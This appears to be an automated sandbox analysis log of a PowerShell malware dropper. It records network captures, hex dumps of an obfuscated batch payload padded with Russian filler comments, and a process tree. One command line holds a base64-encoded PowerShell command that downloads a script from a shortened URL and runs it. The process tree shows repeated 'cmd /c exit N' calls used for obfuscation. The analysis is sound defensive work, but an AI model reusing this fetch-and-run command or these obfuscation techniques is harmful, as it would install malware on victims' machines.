                      Location: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed
                      Cache-Control: no-cache
                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                      X-Frame-Options: deny
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 0
                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                      2024-10-05 12:51:31 UTC4058INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.649714185.199.111.1334433468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      2024-10-05 12:51:32 UTC620OUTGET /github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: objects.githubusercontent.com
                      Connection: Keep-Alive
                      2024-10-05 12:51:32 UTC647INHTTP/1.1 200 OK
                      Connection: close
                      Content-Length: 132304
                      x-amz-id-2: CbUtBSCvRQEb5u3uInkOjtLHrUrZjRZngwHbdGGZWL8bJ6p2Hx9GaIkI8TM5oIgLIfhGuAQAeK4=
                      x-amz-request-id: DY29AV3E68E7E9BD
                      Last-Modified: Thu, 03 Oct 2024 23:09:19 GMT
                      ETag: "a07fcb39b340ad8dea993a5f5c4d9064"
                      x-amz-server-side-encryption: AES256
                      Content-Disposition: attachment;filename=powershell.zip
                      Content-Type: application/x-zip-compressed
                      Server: AmazonS3
                      Fastly-Restarts: 1
                      Accept-Ranges: bytes
                      Age: 0
                      Date: Sat, 05 Oct 2024 12:51:32 GMT
                      Via: 1.1 varnish
                      X-Served-By: cache-ewr-kewr1740046-EWR
                      X-Cache: HIT
                      X-Cache-Hits: 0
                      X-Timer: S1728132692.331628,VS0,VE54
                      2024-10-05 12:51:32 UTC1378INData Raw: ff fe 26 63 6c 73 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 20 75 63 62 77 3d 73 65 74 0d 0a 3a 3a 20 d0 9f d1 83 d1 82 d0 b5 d1 88 d0 b5 d1 81 d1 82 d0 b2 d0 b8 d1 8f 20 d0 b2 20 d0 b2 d0 be d0 be d0 b1 d1 80 d0 b0 d0 b6 d0 b5 d0 bd d0 b8 d0 b8 2c 20 d0 ba d0 b0 d0 ba 20 d0 b8 20 d0 bf d1 83 d1 82 d0 b5 d1 88 d0 b5 d1 81 d1 82 d0 b2 d0 b8 d1 8f 20 d0 b2 20 d1 80 d0 b5 d0 b0 d0 bb d1 8c d0 bd d0 be d1 81 d1 82 d0 b8 2c 20 d0 bc d0 be d0 b3 d1 83 d1 82 20 d0 bf d1 80 d0 b8 d0 b2 d0 b5 d1 81 d1 82 d0 b8 20 d0 ba 20 d1 83 d0 b4 d0 b8 d0 b2 d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d1 8b d0 bc 20 d0 be d1 82 d0 ba d1 80 d1 8b d1 82 d0 b8 d1 8f d0 bc 20 d0 b8 20 d0 bd d0 b5 d0 b7 d0 b0 d0 b1 d1 8b d0 b2 d0 b0 d0 b5 d0 bc d1 8b d0 bc 20 d0 b2 d1 81 d1 82 d1 80
                      Data Ascii: &cls@echo offset ucbw=set:: , ,
                      2024-10-05 12:51:32 UTC1378INData Raw: 3a 20 d0 92 d1 81 d1 8f d0 ba d0 b8 d0 b9 20 d1 80 d0 b0 d0 b7 2c 20 d0 ba d0 be d0 b3 d0 b4 d0 b0 20 d0 b2 d1 81 d1 82 d1 80 d0 b5 d1 87 d0 b0 d1 8e d1 82 d1 81 d1 8f 20 d0 b4 d1 80 d1 83 d0 b7 d1 8c d1 8f 2c 20 d0 b2 d0 be d1 81 d0 bf d0 be d0 bc d0 b8 d0 bd d0 b0 d0 bd d0 b8 d1 8f 20 d0 be d0 b1 20 d1 83 d0 b4 d0 be d0 b2 d0 be d0 bb d1 8c d1 81 d1 82 d0 b2 d0 b8 d0 b8 20 d0 bd d0 b0 d0 bf d0 be d0 bb d0 bd d1 8f d1 8e d1 82 20 d0 b2 d0 be d0 b7 d0 b4 d1 83 d1 85 2c 20 d1 81 d0 bb d0 be d0 b2 d0 bd d0 be 20 d0 b0 d1 80 d0 be d0 bc d0 b0 d1 82 d0 bd d1 8b d0 b9 20 d1 87 d0 b0 d0 b9 d0 bd d0 b8 d0 ba 2c 20 d0 ba d0 be d1 82 d0 be d1 80 d1 8b d0 b9 20 d0 bd d0 b5 d0 b2 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 20 d0 be d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2
                      Data Ascii: : , , , ,
                      2024-10-05 12:51:32 UTC1378INData Raw: 77 25 25 71 6d 79 25 7a 65 72 25 6a 78 61 61 25 65 0d 0a 3a 3a 20 d0 a0 d0 b0 d0 b7 d0 bc d1 8b d1 88 d0 bb d0 b5 d0 bd d0 b8 d1 8f 20 d0 be 20 d0 b2 d0 b5 d1 87 d0 bd d0 be d0 bc 20 d0 b2 d1 81 d0 b5 d0 b3 d0 b4 d0 b0 20 d0 b2 d0 b5 d0 b4 d1 83 d1 82 20 d0 ba 20 d1 82 d0 be d0 bc d1 83 2c 20 d1 87 d1 82 d0 be 20 d0 ba d0 b0 d0 b6 d0 b4 d1 8b d0 b9 20 d0 b8 d1 89 d0 b5 d1 82 20 d1 81 d0 b2 d0 be d0 b9 20 d1 81 d0 be d0 b1 d1 81 d1 82 d0 b2 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 d0 bf d1 83 d1 82 d1 8c 20 d0 ba 20 d0 b3 d0 b0 d1 80 d0 bc d0 be d0 bd d0 b8 d0 b8 20 d0 b8 20 d0 bf d0 be d0 bd d0 b8 d0 bc d0 b0 d0 bd d0 b8 d1 8e 2c 20 d0 b8 20 d0 ba d0 b0 d0 b6 d0 b4 d1 8b d0 b9 20 d1 88 d0 b0 d0 b3 20 d0 bd d0 b0 20 d1 8d d1 82 d0 be d0 bc 20 d0 bf d1 83 d1 82 d0
                      Data Ascii: w%%qmy%zer%jxaa%e:: , ,
                      2024-10-05 12:51:32 UTC1378INData Raw: b5 d1 82 20 d0 b8 d1 81 d1 86 d0 b5 d0 bb d1 8f d1 82 d1 8c 20 d0 b4 d1 83 d1 88 d0 b8 20 d0 b8 20 d0 be d0 b6 d0 b8 d0 b2 d0 bb d1 8f d1 82 d1 8c 20 d0 b2 d0 be d1 81 d0 bf d0 be d0 bc d0 b8 d0 bd d0 b0 d0 bd d0 b8 d1 8f 2c 20 d0 b4 d0 be d1 81 d1 82 d0 b0 d0 b2 d0 bb d1 8f d1 8f 20 d1 81 d0 b5 d1 80 d0 b4 d1 86 d0 b5 20 d0 b2 20 d1 82 d0 b5 20 d0 b2 d1 80 d0 b5 d0 bc d0 b5 d0 bd d0 b0 20 d0 b8 20 d0 bc d0 b5 d1 81 d1 82 d0 b0 2c 20 d0 ba d0 be d1 82 d0 be d1 80 d1 8b d0 b5 20 d0 be d0 bd d0 be 20 d1 83 d0 b6 d0 b5 20 d0 bf d0 be d1 87 d1 82 d0 b8 20 d0 b7 d0 b0 d0 b1 d1 8b d0 bb d0 be 2e 0d 0a 25 75 63 62 77 25 25 71 6d 79 25 25 63 63 64 6e 25 25 73 76 6d 68 25 25 71 6d 79 25 72 74 6f 79 25 6a 78 61 61 25 39 31 36 31 34 35 36 20 25 25 20 39 31 36 31 33
                      Data Ascii: , , .%ucbw%%qmy%%ccdn%%svmh%%qmy%rtoy%jxaa%9161456 %% 91613
                      2024-10-05 12:51:32 UTC1378INData Raw: b8 d1 81 d1 82 d0 be d1 80 d0 b8 d0 b8 20 d0 b7 d0 b0 d0 b1 d1 8b d1 82 d1 8b d1 85 20 d0 ba d0 be d1 80 d0 be d0 bb d0 b5 d0 b9 20 d0 b8 20 d0 b2 d0 be d0 b8 d0 bd d0 be d0 b2 2c 20 d0 ba d0 be d1 82 d0 be d1 80 d1 8b d0 b5 20 d0 b6 d0 b8 d0 bb d0 b8 20 d0 b8 20 d1 83 d0 bc d0 b8 d1 80 d0 b0 d0 bb d0 b8 20 d1 80 d0 b0 d0 b4 d0 b8 20 d0 b8 d0 b4 d0 b5 d0 b9 2c 20 d0 be d1 81 d1 82 d0 b0 d0 b2 d0 b8 d0 b2 20 d1 81 d0 bb d0 b5 d0 b4 20 d0 b2 20 d1 81 d0 b0 d0 bc d0 be d0 b9 20 d1 82 d0 ba d0 b0 d0 bd d0 b8 20 d0 bc d0 b8 d1 80 d0 be d0 b7 d0 b4 d0 b0 d0 bd d0 b8 d1 8f 2e 0d 0a 25 72 66 73 25 25 6b 6e 65 63 25 25 62 67 72 25 25 65 67 73 62 25 25 63 63 64 6e 25 25 72 66 73 25 25 65 67 73 62 25 25 7a 65 72 25 25 64 7a 6a 25 25 6f 7a 66 6c 25 25 6d 65 79 25 25
                      Data Ascii: , , .%rfs%%knec%%bgr%%egsb%%ccdn%%rfs%%egsb%%zer%%dzj%%ozfl%%mey%%
                      2024-10-05 12:51:32 UTC1378INData Raw: 8f d1 85 20 d0 b4 d0 b5 d1 80 d0 b5 d0 b2 d1 8c d0 b5 d0 b2 2c 20 d0 ba d0 b0 d0 ba 20 d0 b4 d1 80 d0 b5 d0 b2 d0 bd d0 b8 d0 b9 20 d0 b3 d0 b8 d0 bc d0 bd 20 d0 b6 d0 b8 d0 b7 d0 bd d0 b8 2c 20 d1 80 d0 b0 d0 b7 d0 bd d0 be d1 81 d0 b8 d1 82 d1 81 d1 8f 20 d0 bf d0 be 20 d0 bb d0 b5 d1 81 d1 83 2c 20 d0 bd d0 b0 d0 bf d0 be d0 bb d0 bd d1 8f d1 8f 20 d0 b5 d0 b3 d0 be 20 d1 80 d0 b0 d0 b4 d0 be d1 81 d1 82 d1 8c d1 8e 20 d0 b8 20 d0 bd d0 b0 d0 bf d0 be d0 bc d0 b8 d0 bd d0 b0 d1 8f 20 d0 be 20 d1 82 d0 be d0 bc 2c 20 d1 87 d1 82 d0 be 20 d0 bf d1 80 d0 b8 d1 80 d0 be d0 b4 d0 b0 20 d0 b2 d1 81 d0 b5 d0 b3 d0 b4 d0 b0 20 d0 b1 d1 8b d0 bb d0 b0 20 d0 b8 20 d0 b1 d1 83 d0 b4 d0 b5 d1 82 20 d0 b2 20 d0 b4 d0 b2 d0 b8 d0 b6 d0 b5 d0 bd d0 b8 d0 b8 2e 0d 0a
                      Data Ascii: , , , , .
                      2024-10-05 12:51:32 UTC1378INData Raw: d0 b0 d0 bf d0 b0 d1 85 d0 b8 20 d0 b4 d0 b0 d0 bb d1 91 d0 ba d0 b8 d1 85 20 d1 81 d1 82 d1 80 d0 b0 d0 bd 2c 20 d0 b3 d0 b4 d0 b5 20 d0 ba d1 83 d0 bb d1 8c d1 82 d1 83 d1 80 d0 b0 20 d1 81 d0 bc d0 b5 d1 88 d0 b8 d0 b2 d0 b0 d0 b5 d1 82 d1 81 d1 8f 20 d1 81 20 d0 b8 d1 81 d1 82 d0 be d1 80 d0 b8 d0 b5 d0 b9 2c 20 d0 b0 20 d0 ba d0 b0 d0 b6 d0 b4 d1 8b d0 b9 20 d0 ba d0 b0 d0 bc d0 b5 d0 bd d1 8c 20 d0 bd d0 b0 20 d0 bc d0 be d1 81 d1 82 d0 be d0 b2 d0 be d0 b9 20 d1 85 d1 80 d0 b0 d0 bd d0 b8 d1 82 20 d0 b2 20 d1 81 d0 b5 d0 b1 d0 b5 20 d1 82 d0 b0 d0 b9 d0 bd d1 8b 20 d0 b2 d0 b5 d0 ba d0 be d0 b2 2e 0d 0a 25 75 63 62 77 25 25 71 6d 79 25 25 63 63 64 6e 25 25 73 76 6d 68 25 25 71 6d 79 25 73 79 6f 25 6a 78 61 61 25 34 38 33 37 30 39 32 20 25 25 20 34
                      Data Ascii: , , .%ucbw%%qmy%%ccdn%%svmh%%qmy%syo%jxaa%4837092 %% 4
                      2024-10-05 12:51:32 UTC1378INData Raw: d0 b4 d0 b2 d0 b5 d1 80 d0 b8 20 d0 ba 20 d1 81 d0 b0 d0 bc d1 8b d0 bc 20 d0 b3 d0 bb d1 83 d0 b1 d0 be d0 ba d0 b8 d0 bc 20 d1 80 d0 b0 d0 b7 d0 bc d1 8b d1 88 d0 bb d0 b5 d0 bd d0 b8 d1 8f d0 bc 20 d0 b8 20 d0 bf d0 be d0 b7 d0 b2 d0 be d0 bb d1 8f d0 b5 d1 82 20 d1 83 d0 b2 d0 b8 d0 b4 d0 b5 d1 82 d1 8c 20 d0 bc d0 b8 d1 80 20 d1 81 20 d1 81 d0 be d0 b2 d0 b5 d1 80 d1 88 d0 b5 d0 bd d0 bd d0 be 20 d0 bd d0 be d0 b2 d0 be d0 b9 20 d0 bf d0 b5 d1 80 d1 81 d0 bf d0 b5 d0 ba d1 82 d0 b8 d0 b2 d1 8b 2c 20 d0 bd d0 b5 d0 b4 d0 be d1 81 d1 82 d1 83 d0 bf d0 bd d0 be d0 b9 20 d0 b2 20 d1 81 d1 83 d0 b5 d1 82 d0 b5 20 d0 bf d0 be d0 b2 d1 81 d0 b5 d0 b4 d0 bd d0 b5 d0 b2 d0 bd d0 be d1 81 d1 82 d0 b8 2e 0d 0a 25 72 66 73 25 25 6b 6e 65 63 25 25 62 67 72 25 25
                      Data Ascii: , .%rfs%%knec%%bgr%%
                      2024-10-05 12:51:32 UTC1378INData Raw: 25 25 65 67 73 62 25 25 7a 65 72 25 25 64 7a 6a 25 25 6f 7a 66 6c 25 25 6d 65 79 25 25 65 67 73 62 25 25 79 75 6f 7a 25 0d 0a 3a 3a 20 d0 a2 d0 b5 d0 bf d0 bb d1 8b d0 b9 20 d0 b2 d0 b5 d1 82 d0 b5 d1 80 20 d0 bf d1 80 d0 b8 d0 bd d0 be d1 81 d0 b8 d1 82 20 d1 81 20 d1 81 d0 be d0 b1 d0 be d0 b9 20 d0 b7 d0 b0 d0 bf d0 b0 d1 85 d0 b8 20 d0 b4 d0 b0 d0 bb d1 91 d0 ba d0 b8 d1 85 20 d1 81 d1 82 d1 80 d0 b0 d0 bd 2c 20 d0 b3 d0 b4 d0 b5 20 d0 ba d1 83 d0 bb d1 8c d1 82 d1 83 d1 80 d0 b0 20 d1 81 d0 bc d0 b5 d1 88 d0 b8 d0 b2 d0 b0 d0 b5 d1 82 d1 81 d1 8f 20 d1 81 20 d0 b8 d1 81 d1 82 d0 be d1 80 d0 b8 d0 b5 d0 b9 2c 20 d0 b0 20 d0 ba d0 b0 d0 b6 d0 b4 d1 8b d0 b9 20 d0 ba d0 b0 d0 bc d0 b5 d0 bd d1 8c 20 d0 bd d0 b0 20 d0 bc d0 be d1 81 d1 82 d0 be d0 b2 d0
                      Data Ascii: %%egsb%%zer%%dzj%%ozfl%%mey%%egsb%%yuoz%:: , ,
                      2024-10-05 12:51:32 UTC1378INData Raw: 64 25 6a 78 61 61 25 25 3d 65 78 69 74 63 6f 64 65 41 73 63 69 69 25 0d 0a 3a 3a 20 d0 a2 d0 b5 d0 bf d0 bb d1 8b d0 b9 20 d0 b2 d0 b5 d1 82 d0 b5 d1 80 20 d0 bf d1 80 d0 b8 d0 bd d0 be d1 81 d0 b8 d1 82 20 d1 81 20 d1 81 d0 be d0 b1 d0 be d0 b9 20 d0 b7 d0 b0 d0 bf d0 b0 d1 85 d0 b8 20 d0 b4 d0 b0 d0 bb d1 91 d0 ba d0 b8 d1 85 20 d1 81 d1 82 d1 80 d0 b0 d0 bd 2c 20 d0 b3 d0 b4 d0 b5 20 d0 ba d1 83 d0 bb d1 8c d1 82 d1 83 d1 80 d0 b0 20 d1 81 d0 bc d0 b5 d1 88 d0 b8 d0 b2 d0 b0 d0 b5 d1 82 d1 81 d1 8f 20 d1 81 20 d0 b8 d1 81 d1 82 d0 be d1 80 d0 b8 d0 b5 d0 b9 2c 20 d0 b0 20 d0 ba d0 b0 d0 b6 d0 b4 d1 8b d0 b9 20 d0 ba d0 b0 d0 bc d0 b5 d0 bd d1 8c 20 d0 bd d0 b0 20 d0 bc d0 be d1 81 d1 82 d0 be d0 b2 d0 be d0 b9 20 d1 85 d1 80 d0 b0 d0 bd d0 b8 d1 82 20
                      Data Ascii: d%jxaa%%=exitcodeAscii%:: , ,


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:08:51:26
                      Start date:05/10/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
                      Imagebase:0x7ff6e3d50000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:1
                      Start time:08:51:26
                      Start date:05/10/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:3
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:4
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 97
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 98
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 99
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 100
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 101
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 102
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:10
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 103
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:11
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 104
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 105
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 106
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:14
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 107
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:15
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 108
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:16
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 109
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:17
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 110
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:18
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 111
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:19
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 112
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:20
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 113
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:21
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 114
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:22
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 115
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:23
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 116
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:24
                      Start time:08:51:32
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 117
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:25
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 118
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
